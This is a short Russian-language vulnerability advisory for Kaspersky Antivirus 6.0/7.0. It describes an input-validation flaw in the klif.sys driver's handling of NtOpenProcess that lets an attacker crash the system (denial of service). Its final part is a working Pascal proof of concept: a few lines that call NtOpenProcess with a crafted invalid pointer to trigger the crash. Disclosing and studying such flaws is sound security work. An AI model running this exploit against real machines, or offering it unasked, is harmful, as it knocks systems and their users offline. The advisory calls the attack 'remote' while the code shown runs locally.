Программа: Kaspersky Antivirus 6.0/7.0
Уязвимость позволяет удаленному злоумышленнику выполнить DoS атаку на целевую систему. Уязвимость существует из-за ошибки в проверке входных данных в драйвере klif.sys при обработке NtOpenProcess с некорректными параметрами.
Атакующий может передать специально сформированные данные, что приведет к отказу системы в обслуживании.
Пример на языке Pascal:
var
ob1: OBJECT_ATTRIBUTES;
p1: DWORD;
begin
ob1.Length := sizeof(ob1);
NtOpenProcess(@p1, PROCESS_QUERY_INFORMATION, @ob1, pointer($82000000));
end;